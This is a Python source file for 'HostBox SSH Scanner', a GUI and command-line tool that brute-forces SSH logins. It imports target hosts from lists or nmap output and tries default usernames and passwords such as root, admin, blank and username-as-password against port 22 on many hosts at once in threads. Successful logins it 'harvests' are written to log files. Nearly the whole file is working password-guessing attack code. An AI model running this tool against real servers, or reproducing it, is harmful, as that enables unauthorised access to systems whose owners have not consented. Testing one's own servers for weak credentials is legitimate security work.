#!/usr/bin/python

import threading
import logging
import time
import sys
import os
import types
import getopt
import socket
import paramiko
import wx
from wxPython.wx import *
import thread

paramiko.util.log_to_file('logs/temp.log')
#logger = paramiko.util.logging.getLogger()
#logger.setLevel(logging.CRITICAL)

ID_NEW = 1
ID_RENAME = 2
ID_CLEAR = 3
ID_DELETE = 4
ID_USR = 5
ID_PSW = 6
ID_SCN = 7

SCAN_INDEX = 1
        
class HostBoxGUI(wx.Frame):
    def __init__(self, parent, id, title):
        wx.Frame.__init__(self, parent, id, title, size=(946, 686))

        panel = wx.Panel(self, -1)
        hbox = wx.BoxSizer(wx.HORIZONTAL)
        self.scanindex = 1
        self.usernames = ["admin","root","guest"]
        self.passwords = ["blank","password","-username"]

        self.listbox = wx.ListBox(panel, -1)
        hbox.Add(self.listbox, 1, wx.EXPAND | wx.ALL, 20)
        
        vbox = wx.BoxSizer(wx.VERTICAL)
        btnPanel = wx.Panel(panel, -1)
        new = wx.Button(btnPanel, ID_NEW, 'Import', size=(90, 30))
        ren = wx.Button(btnPanel, ID_RENAME, 'Rename', size=(90, 30))
        dlt = wx.Button(btnPanel, ID_DELETE, 'Delete', size=(90, 30))
        clr = wx.Button(btnPanel, ID_CLEAR, 'Clear', size=(90, 30))
        setusr = wx.Button(btnPanel, ID_USR, 'Set Usernames', size=(120, 30))
        setpass = wx.Button(btnPanel, ID_PSW, 'Set Passwords', size=(120, 30))
        startscan = wx.Button(btnPanel, ID_SCN, 'Start Scan', size=(120, 30))
        self.skipacc = wxCheckBox ( btnPanel,-1, 'skip on successful account login' )
        self.skipsrv = wxCheckBox ( btnPanel,-1, 'skip on successful server login' )
        
        self.rb1 = wx.RadioButton(btnPanel, label='Normal Scan', pos=(5, 510), style=wx.RB_GROUP)
        self.rb2 = wx.RadioButton(btnPanel, label='Fast Scan Mode (beta)', pos=(5, 530))

        self.Bind(wx.EVT_BUTTON, self.NewItem, id=ID_NEW)
        self.Bind(wx.EVT_BUTTON, self.OnRename, id=ID_RENAME)
        self.Bind(wx.EVT_BUTTON, self.OnDelete, id=ID_DELETE)
        self.Bind(wx.EVT_BUTTON, self.OnClear, id=ID_CLEAR)
        self.Bind(wx.EVT_LISTBOX_DCLICK, self.OnRename)
        self.Bind(wx.EVT_BUTTON, self.Usr, id=ID_USR)
        self.Bind(wx.EVT_BUTTON, self.Psw, id=ID_PSW)
        self.Bind(wx.EVT_BUTTON, self.Scan, id=ID_SCN)
        
        
        vbox.Add((-1, 20))
        vbox.Add(new)
        vbox.Add(ren, 0, wx.TOP, 5)
        vbox.Add(dlt, 0, wx.TOP, 5)
        vbox.Add(clr, 0, wx.TOP, 5)
        vbox.Add((-1, 20))
        vbox.Add(setusr, 0, wx.TOP, 5)
        vbox.Add(setpass, 0, wx.TOP, 5)
        vbox.Add((-1, 55))
        vbox.Add(startscan, 0, wx.TOP, 5)
        vbox.Add((-1, 55))
        vbox.Add(self.skipacc, 0, wx.TOP, 5)
        vbox.Add(self.skipsrv, 0, wx.TOP, 5)
        
        btnPanel.SetSizer(vbox)
        hbox.Add(btnPanel, 0.6, wx.EXPAND | wx.RIGHT, 20)
        panel.SetSizer(hbox)

        self.Centre()
        self.Show(True)
        
    
    def Scan(self, event):
        global SCAN_INDEX
        index = SCAN_INDEX
        hosts = self.listbox.GetStrings()
        skipacc = False
        skipsrv = False
        breakoption = ""
        scantype = 0
        
        
        if self.skipacc.GetValue():
            skipacc = True
            
        if self.skipsrv.GetValue():
            skipsrv = True
            
        if self.rb1.GetValue():
            thread.start_new_thread(self.funcScan,(hosts,index,skipacc,skipsrv))
            wx.MessageBox('Scanner started, positive results will be written to the log directory', 'Info', wx.OK | wx.ICON_INFORMATION)
            SCAN_INDEX += 1

        
        if self.rb2.GetValue():
            if skipsrv == True:
                breakoption = "breaksrv"
            if skipacc == True:
                breakoption = "breakacc"
            pathname = getLogPath()
            multiThreader(hosts,self.usernames,self.passwords,breakoption,pathname)
            
        
    def funcScan(self,hosts,index,skipacc,skipsrv):
        
        breakacc = False
        breaksrv = False
        users = []
        passw = []
        
        pathname = getLogPath()
        
        try:
            flogfile = open(pathname, "w")
        except IOError:
            print "Error: can\'t open logfile. Please report error to http://stridsmanit.wordpress.com/ssh-scanner/!"
    
        
        for h in hosts:
            s = socket.socket()
            try:
                s.connect((h, 22))
                s.close()
                
                for u in self.usernames:
                    if breaksrv:
                        breaksrv = False
                        break
                    if breakacc:
                        breakacc = False
                        next
                    
                        
                    for p in self.passwords:
                        
                        if breakacc:
                            breakacc = False
                            break
                        if breaksrv:
                            break
                    
                        if p == 'blank':
                            p = ''
                        if p == '-username':
                            p = u
        
                        ssh = paramiko.SSHClient()
                        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                        print "%s: Logging in with %s / %s" % (h,u,p)
        
                        try:
                            msg = ssh.connect(h, username=u, password=p)
            
                            if msg == None:
                                print("On Host: %s found login combination: %s / %s" % (h,u,p))
                                
                                try:
                                    flogfile.write("On Host: %s found login combination: %s / %s\n" % (h,u,p))
                                except IOError:
                                    print "Error: can\'t write to logfile. Please report error to http://stridsmanit.wordpress.com/ssh-scanner/!"
    
                                ssh.close()
                                if skipacc:
                                    breakacc = True
                                if skipsrv:
                                    breaksrv = True

                        except:
                            pass
                    
                    if breaksrv:
                        breaksrv = False
                        break
            
            except Exception, e:
                print "%s: Host Unreachable. Skipping to next!" % (h)
                next
            
        print "Scan %i has finished." % (index) 
        flogfile.close()    
        
        
    
    def Usr(self, event):
        temp = ""
        
        for s in self.usernames:
            temp += s
            temp += ";"
        
        text = temp[0:-1]
        renamed = wx.GetTextFromUser('Rename item', 'Set usernames', text)
        if renamed != '':
            self.usernames = cleanPassList(renamed)
            
            
    def Psw(self, event):
        temp = ""
        
        for s in self.passwords:
            temp += s
            temp += ";"
        
        text = temp[0:-1]
        renamed = wx.GetTextFromUser('Rename item', 'Set passwords', text)
        if renamed != '':
            self.passwords = cleanPassList(renamed)
    
    def NewItem(self, event):
        filters = 'All files (*.*)|*.*|Stridsman Logfiles (*.slg)|*.slg'

        dialog = wxFileDialog ( None, message = 'Open something....', wildcard = filters, style = wxOPEN | wxMULTIPLE )

        if dialog.ShowModal() == wxID_OK:
            selected = dialog.GetPath()
            dialog.Destroy()
            
            hostlines = getInfile(selected)
            for l in hostlines:
                j = l.rstrip()
                self.listbox.Append(j)
            
           

    def OnRename(self, event):
        sel = self.listbox.GetSelection()
        text = self.listbox.GetString(sel)
        renamed = wx.GetTextFromUser('Rename item', 'Rename dialog', text)
        if renamed != '':
            self.listbox.Delete(sel)
            self.listbox.Insert(renamed, sel)


    def OnDelete(self, event):
        sel = self.listbox.GetSelection()
        if sel != -1:
            self.listbox.Delete(sel)

    def OnClear(self, event):
        self.listbox.Clear()
        


class HostBox(threading.Thread):
    
    def __init__(self,usernames,passwords,host,breakoption,id,pathname):
        self.usernames = []
        self.passwords = []
        
        self.usernames = usernames
        self.passwords = passwords
        
        self.breakoption = breakoption
        temp = ["ssh", str(id)]
        self.id = ""
        self.id = self.id.join(temp)
        self.host = host
        threading.Thread.__init__(self)
        self.pathname = pathname
        
        
    def run(self):
        print "%s: Scan started on host: %s." %(self.id,self.host)
        breakacc = False
        breaksrv = False
        exec '%s = paramiko.SSHClient()' %(self.id)
        exec '%s.set_missing_host_key_policy(paramiko.AutoAddPolicy())' %(self.id)
        accountharvest = []
        
        s = socket.socket()
        try:
            s.connect((self.host, 22))
            s.close()
            
            for u in self.usernames:
		
                for p in self.passwords:
                    
                    if self.breakoption == "breakacc":
                        if breakacc:
                            breakacc = False
                            break
                    if self.breakoption == "breaksrv":
                        if breaksrv:
                            break
                    
                    
                    if p == 'blank':
                        p = ''
                    if p == '-username':
                        p = u
                
                
                    try:
                        exec 'msg = %s.connect(self.host, username=u, password=p)' %(self.id)
            
                        if msg == None:
                            accountharvest.append("On Host: %s found login combination: %s / %s\n" % (self.host,u,p))
                            print("%s: On host: %s found login combination: %s / %s" % (self.id,self.host,u,p))
                            exec '%s.close()' %(self.id)
                            if self.breakoption == "breakacc":
                                breakacc = True
                            if self.breakoption == "breaksrv":
                                breaksrv = True
                                
                    
                            
                    except:
                        pass
                
                if self.breakoption == "breakacc":
                        if breakacc:
                            breakacc = False
                            break
                if self.breakoption == "breaksrv":
                        if breaksrv:
                            break
            
        
            if accountharvest != []:
                try:
                    flogfile = open(self.pathname, "a")
                    for accounts in accountharvest:
                        flogfile.write(accounts)
                    flogfile.close()
                except IOError:
                    print "Error: can\'t write to logfile. Please report error to http://stridsmanit.wordpress.com/ssh-scanner/!"
    
            print "%s: Scan finished." %(self.id)
        
        
        except Exception, e:
            print "%s: %s is unreachable. skipping to next!" % (self.id,self.host)
        
    
        
def printHelp():
    os.system("clear")
    print 'HostBox-SSH.py -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2] [-n/-f]'
    print '\nUsername Options: -u user1,user2,user3.. || --ufile=usernames.txt\n'
    print 'Password Options: -p pass1,pass2,pass3.. || --pfile=passwords.txt\n'
    print '\nBreak Options: -1: Break on account login'
    print '               -2: Break on server login\n\n'
    print 'Speed Options: -n for normal scan || -f for fast scan mode\n\n'
    
    
def getLogPath():
    pathname = ""
    localtime = time.asctime( time.localtime(time.time()) )
    localtime = localtime.replace(' ', '_')
    ext = ["logs/",localtime, ".slg"]
    pathname = pathname.join(ext)
    return(pathname)

def getInfile(path):
    hostlist = []
    fobject = open(path, "r")
    hostlines = fobject.readlines()
        
    if "# Nmap" in hostlines[0]:
        succimport = False
        for l in hostlines:
            if "22/open/" in l:
                ip = l.split(' ')
                hostlist.append(ip[1])
                succimport = True
        if succimport == False:
            print 'No open ssh ports found in the selected iplist (or not a greppable nmap log!)'
            
        return(hostlist)
    
    

    else:
        for lines in hostlines:
            lines = lines.strip('\n')
            hostlist.append(lines)
            return(hostlines)
        
def getPassList(path):
    passlist = []
    fobject = open(path, "r")
    passlines = fobject.readlines()
    
    for p in passlines:
        a = p.strip('\n')
        passlist.append(a)
    
    return(passlist)


def cleanPassList(passwords):
    
    passw = []
    
    if isinstance(passwords, types.StringTypes):
        
        if ";" in passwords:
            passw = passwords.split(';')
        elif "," in passwords:
            passw = passwords.split(',')
        else:
            passw.append(passwords)
            
        return(passw)
    else:
        
        return(passwords)
    
    
    
def consoleScan(hostlist,usernames,passwords,breakoption):
        
    breakacc = False
    breaksrv = False
        
    pathname = getLogPath()
    
    users = cleanPassList(usernames)
    passw = cleanPassList(passwords)
    
    
    try:
        flogfile = open(pathname, "a")
    except IOError:
        print "Error: can\'t write to logfile. Please report error to http://stridsmanit.wordpress.com/ssh-scanner/!"
    
    os.system("clear")  
    
    for h in hostlist:
        s = socket.socket()
        try:
            s.connect((h, 22))
            s.close()
                
            for u in users:
                
                if breakacc:
                    breakacc = False
                    next
                
                        
                for p in passw:
                        
                    if breakacc:
                        breakacc = False
                        break
                    if breaksrv:
                        break
                    
                    if p == 'blank':
                        p = ''
                    if p == '-username':
                        p = u
        
                    ssh = paramiko.SSHClient()
                    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                    print "%s: Logging in with %s / %s" % (h,u,p)
        
                    try:
                        msg = ssh.connect(h, username=u, password=p)
            
                        if msg == None:
                            print("On Host: %s found login combination: %s / %s" % (h,u,p))
                            try:
                                flogfile.write("On Host: %s found login combination: %s / %s\n" % (h,u,p))
                            except IOError:
                                print "Error: can\'t write to logfile. Please report error to http://stridsmanit.wordpress.com/ssh-scanner/!"
                            ssh.close()
                            
                            if breakoption == "breakacc":
                                breakacc = True
                            if breakoption == "breaksrv":
                                breaksrv = True
                    except:
                        pass
                    
                if breaksrv:
                    breaksrv = False
                    break
        except Exception, e:
            print "%s: Host Unreachable. Skipping to next!" % (h)
            next
    
    localtime = time.asctime( time.localtime(time.time()) )        
    print "Scan %s has finished." % (localtime) 
    flogfile.close()    
    
def multiThreader(hosts,usernames,passwords,breakoption,pathname):    
    
    size = len(hosts)
    threads = [0 for i in range(size)]
    
    x = 0
    
    while x < size:
        
        threads[x] = HostBox(usernames,passwords,hosts[x],breakoption,x,pathname)
        x += 1
    
    
        
    x = 0
    z = 0
    stepper = 20
    if size < 20:
        stepper = size
        
    while x < size:
        
        if (size - x  < 20):
            stepper = size - x
            
        print "Scanning %i / %i servers" % (x+stepper,size)
        
        while z < stepper:
            threads[z].start()
            z += 1
        
        alive = True
        y = z - stepper
        
        while alive:
            alive = False
            while y < stepper:
                testthread = threads[y].isAlive()
                if testthread:
                    alive = True
                y += 1
            y = z - stepper
                
        x += stepper
    
    try:    
        os.remove("logs/temp.log")
    except:
        pass
    

def main(argv):
    
    
    usernames = []
    passwords = []
    hosts = []
    breakoption = ""
    scanmode = 1
    
    app = wx.App()
    HostBoxGUI(None, -1, 'Oskar Stridsman\'s IT Resource: HostBox SSH Scanner')
    
    try:
        opts,args = getopt.getopt(argv,"hi:u:p:12nf",["ifile=","ufile=","pfile="])
        print opts,args
        
    except getopt.GetoptError:
        printHelp()
        sys.exit()
        
    if opts == []:
        app.MainLoop()
        
    for opt, arg in opts:
        if opt == '-h':
            printHelp()
            sys.exit()
        elif opt in ("-i", "--ifile"):
            hosts = getInfile(arg)
                
        elif opt == "--ufile":
            usernames = getPassList(arg)
                    
        elif opt == "--pfile":
            passwords = getPassList(arg)
                
        elif opt == "-u":
            usernames = cleanPassList(arg)
                
        elif opt == "-p":
            passwords = cleanPassList(arg)
                
        elif opt == "-1":
            breakoption = "breakacc"
                
        elif opt == "-2":
            breakoption = "breaksrv"
        
        elif opt == "-n":
            scanmode = 1
        
        elif opt == "-f":
            scanmode = 2
        
    if usernames == "":
        printHelp()
        sys.exit()
    if passwords == "":
        printHelp()
        sys.exit()
    if hosts == "":
        printHelp()
        sys.exit()
        
    if scanmode == 1:
          
        consoleScan(hosts,usernames,passwords,breakoption)
        
    if scanmode == 2:
            pathname = getLogPath()
            multiThreader(hosts,usernames,passwords,breakoption,pathname)
        
        
    
        
                
    
if __name__ == "__main__":
    main(sys.argv[1:])   

